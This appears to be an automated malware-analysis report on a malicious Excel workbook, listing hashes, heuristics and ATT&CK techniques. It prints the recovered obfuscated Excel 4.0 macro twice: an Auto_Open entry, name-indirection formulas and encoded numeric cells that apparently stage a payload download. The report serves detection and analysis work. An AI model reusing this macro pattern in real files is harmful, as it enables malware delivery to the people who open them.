Office (OLE) malware analysis — malicious · bf99aa7a455dfedc

MALICIOUS

Office (OLE)

36.0 KB Created: 2020-11-27 11:38:01 Authoring application: Microsoft Excel First seen: 2021-08-20

MD5: 91590cfe45d0b1fd2f23a694da1923d5 SHA-1: be0cb4009eb845e29fb1f14f04746ef5f736f6a8 SHA-256: bf99aa7a455dfedca8b999be1a64985fdd2fc1efdf29ba24be434e3f77c3a3af

140 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

The critical heuristics indicate the presence of Excel 4.0 macros with an Auto_Open entry, which is a common method for executing malicious code upon opening the document. The macro sheet contains a large amount of obfuscated data, suggesting it is designed to download and execute a second-stage payload. The specific functions used in the macro are flagged as dangerous, further supporting malicious intent.

Heuristics 3

Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME

oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FN

Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN

Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 6903 bytes

Filename	Kind	Source	Size
`xlm_macros.txt`	xlm-macro	oletools.olevba.extract_all_macros (XLM macro listing)	6903 bytes
SHA-256: `2452b4e702b1ab34412b8b2de41605c32bdf74a88f7eb651f2afa7b9583f81d0`
Preview script First 1,000 lines of the extracted script ' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0085 20 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - rfumANsfBya ' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!H135 ' 0018 26 LABEL : Cell Value, String Constant - BwugBnuijoZ len=0 ' 0018 21 LABEL : Cell Value, String Constant - CdaobU len=0 ' 0018 27 LABEL : Cell Value, String Constant - CfHnnNbijcJo len=0 ' 0018 24 LABEL : Cell Value, String Constant - coVMSEdJw len=0 ' 0018 22 LABEL : Cell Value, String Constant - FJklnPm len=0 ' 0018 23 LABEL : Cell Value, String Constant - GXhHQIFH len=0 ' 0018 26 LABEL : Cell Value, String Constant - JBqjxLZBSxC len=0 ' 0018 22 LABEL : Cell Value, String Constant - KdAFcOX len=0 ' 0018 27 LABEL : Cell Value, String Constant - kJxpvUeMJRlJ len=0 ' 0018 22 LABEL : Cell Value, String Constant - kvkriIi len=0 ' 0018 22 LABEL : Cell Value, String Constant - MjSmAWw len=0 ' 0018 27 LABEL : Cell Value, String Constant - oBTMuqmMNTMd len=0 ' 0018 27 LABEL : Cell Value, String Constant - OhnLJVkJWxiW len=0 ' 0018 21 LABEL : Cell Value, String Constant - OKbVka len=0 ' 0018 26 LABEL : Cell Value, String Constant - ShbijRFYyYV len=0 ' 0018 23 LABEL : Cell Value, String Constant - syOSXkDK len=0 ' 0018 21 LABEL : Cell Value, String Constant - uhepCH len=0 ' 0018 26 LABEL : Cell Value, String Constant - xlRUErtySCe len=0 ' 0018 25 LABEL : Cell Value, String Constant - YHHYDPEfFu len=0 ' 0018 24 LABEL : Cell Value, String Constant - yzCKLfFdX len=0 ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' Sheet,Reference,Formula,Value ' rfumANsfBya,H45,"SET.NAME("MjSmAWw",0+VALUE("0"))","" ' rfumANsfBya,H47,"SET.NAME("GXhHQIFH",MjSmAWw)","" ' rfumANsfBya,H52,"SET.NAME("YHHYDPEfFu",MjSmAWw)","" ' rfumANsfBya,H55,"SET.NAME("uhepCH",COUNTA(BwugBnuijoZ))","" ' rfumANsfBya,H57,"SET.NAME("CdaobU",COUNTA(ShbijRFYyYV))","" ' rfumANsfBya,H62,[],"" ' rfumANsfBya,H64,"SET.NAME("oBTMuqmMNTMd","")","" ' rfumANsfBya,H67,"GXhHQIFH","" ' rfumANsfBya,H71,"SET.NAME("KdAFcOX",HLOOKUP("",BwugBnuijoZ,GXhHQIFH,FALSE))","" ' rfumANsfBya,H74,"coVMSEdJw","" ' rfumANsfBya,H77,"SET.NAME("syOSXkDK",MjSmAWw)","" ' rfumANsfBya,P80,"",827.00000000000000000000 ' rfumANsfBya,P81,"",557.00000000000000000000 ' rfumANsfBya,H82,[],"" ' rfumANsfBya,P82,"",-708.00000000000000000000 ' rfumANsfBya,P83,"",-647.00000000000000000000 ' rfumANsfBya,P84,"",-261.00000000000000000000 ' rfumANsfBya,P85,"",722.00000000000000000000 ' rfumANsfBya,H86,"syOSXkDK","" ' rfumANsfBya,H91,"FJklnPm","" ' rfumANsfBya,H95,"OhnLJVkJWxiW","" ' rfumANsfBya,H100,"CfHnnNbijcJo","" ' rfumANsfBya,H104,"SET.NAME("JBqjxLZBSxC",VALUE(HLOOKUP("",ShbijRFYyYV,CfHnnNbijcJo,FALSE)))","" ' rfumANsfBya,H107,"xlRUErtySCe","" ' rfumANsfBya,H111,"oBTMuqmMNTMd","" ' rfumANsfBya,H113,"YHHYDPEfFu","" ' rfumANsfBya,H116,NEXT(),"" ' rfumANsfBya,H120,"yzCKLfFdX","" ' rfumANsfBya,H124,[],"" ' rfumANsfBya,H126,"kJxpvUeMJRlJ","" ' rfumANsfBya,H129,NEXT(),"" ' rfumANsfBya,H132,RETURN(),"" ' rfumANsfBya,H161,"SET.NAME("kvkriIi",H45)","" ' rfumANsfBya,H164,"BwugBnuijoZ","" ' rfumANsfBya,H169,"SET.NAME("ShbijRFYyYV",R44C14)","" ' rfumANsfBya,H173,"SET.NAME("kJxpvUeMJRlJ",182)","" ' rfumANsfBya,H178,"SET.NAME("OKbVka",8)","" ' rfumANsfBya,H181,kvkriIi(),"" ' rfumANsfBya,H182,HALT(),""

SHA-256: 2452b4e702b1ab34412b8b2de41605c32bdf74a88f7eb651f2afa7b9583f81d0

Preview script

First 1,000 lines of the extracted script

' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     20 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  rfumANsfBya
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Sheet!H135 
' 0018     26 LABEL : Cell Value, String Constant - BwugBnuijoZ len=0 
' 0018     21 LABEL : Cell Value, String Constant - CdaobU len=0 
' 0018     27 LABEL : Cell Value, String Constant - CfHnnNbijcJo len=0 
' 0018     24 LABEL : Cell Value, String Constant - coVMSEdJw len=0 
' 0018     22 LABEL : Cell Value, String Constant - FJklnPm len=0 
' 0018     23 LABEL : Cell Value, String Constant - GXhHQIFH len=0 
' 0018     26 LABEL : Cell Value, String Constant - JBqjxLZBSxC len=0 
' 0018     22 LABEL : Cell Value, String Constant - KdAFcOX len=0 
' 0018     27 LABEL : Cell Value, String Constant - kJxpvUeMJRlJ len=0 
' 0018     22 LABEL : Cell Value, String Constant - kvkriIi len=0 
' 0018     22 LABEL : Cell Value, String Constant - MjSmAWw len=0 
' 0018     27 LABEL : Cell Value, String Constant - oBTMuqmMNTMd len=0 
' 0018     27 LABEL : Cell Value, String Constant - OhnLJVkJWxiW len=0 
' 0018     21 LABEL : Cell Value, String Constant - OKbVka len=0 
' 0018     26 LABEL : Cell Value, String Constant - ShbijRFYyYV len=0 
' 0018     23 LABEL : Cell Value, String Constant - syOSXkDK len=0 
' 0018     21 LABEL : Cell Value, String Constant - uhepCH len=0 
' 0018     26 LABEL : Cell Value, String Constant - xlRUErtySCe len=0 
' 0018     25 LABEL : Cell Value, String Constant - YHHYDPEfFu len=0 
' 0018     24 LABEL : Cell Value, String Constant - yzCKLfFdX len=0 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
'  rfumANsfBya,H45,"SET.NAME("MjSmAWw",0+VALUE("0"))",""
'  rfumANsfBya,H47,"SET.NAME("GXhHQIFH",MjSmAWw)",""
'  rfumANsfBya,H52,"SET.NAME("YHHYDPEfFu",MjSmAWw)",""
'  rfumANsfBya,H55,"SET.NAME("uhepCH",COUNTA(BwugBnuijoZ))",""
'  rfumANsfBya,H57,"SET.NAME("CdaobU",COUNTA(ShbijRFYyYV))",""
'  rfumANsfBya,H62,[],""
'  rfumANsfBya,H64,"SET.NAME("oBTMuqmMNTMd","")",""
'  rfumANsfBya,H67,"GXhHQIFH",""
'  rfumANsfBya,H71,"SET.NAME("KdAFcOX",HLOOKUP("*",BwugBnuijoZ,GXhHQIFH,FALSE))",""
'  rfumANsfBya,H74,"coVMSEdJw",""
'  rfumANsfBya,H77,"SET.NAME("syOSXkDK",MjSmAWw)",""
'  rfumANsfBya,P80,"",827.00000000000000000000
'  rfumANsfBya,P81,"",557.00000000000000000000
'  rfumANsfBya,H82,[],""
'  rfumANsfBya,P82,"",-708.00000000000000000000
'  rfumANsfBya,P83,"",-647.00000000000000000000
'  rfumANsfBya,P84,"",-261.00000000000000000000
'  rfumANsfBya,P85,"",722.00000000000000000000
'  rfumANsfBya,H86,"syOSXkDK",""
'  rfumANsfBya,H91,"FJklnPm",""
'  rfumANsfBya,H95,"OhnLJVkJWxiW",""
'  rfumANsfBya,H100,"CfHnnNbijcJo",""
'  rfumANsfBya,H104,"SET.NAME("JBqjxLZBSxC",VALUE(HLOOKUP("*",ShbijRFYyYV,CfHnnNbijcJo,FALSE)))",""
'  rfumANsfBya,H107,"xlRUErtySCe",""
'  rfumANsfBya,H111,"oBTMuqmMNTMd",""
'  rfumANsfBya,H113,"YHHYDPEfFu",""
'  rfumANsfBya,H116,NEXT(),""
'  rfumANsfBya,H120,"yzCKLfFdX",""
'  rfumANsfBya,H124,[],""
'  rfumANsfBya,H126,"kJxpvUeMJRlJ",""
'  rfumANsfBya,H129,NEXT(),""
'  rfumANsfBya,H132,RETURN(),""
'  rfumANsfBya,H161,"SET.NAME("kvkriIi",H45)",""
'  rfumANsfBya,H164,"BwugBnuijoZ",""
'  rfumANsfBya,H169,"SET.NAME("ShbijRFYyYV",R44C14)",""
'  rfumANsfBya,H173,"SET.NAME("kJxpvUeMJRlJ",182)",""
'  rfumANsfBya,H178,"SET.NAME("OKbVka",8)",""
'  rfumANsfBya,H181,kvkriIi(),""
'  rfumANsfBya,H182,HALT(),""

Open this report in the interactive analyzer, or submit your own file for analysis.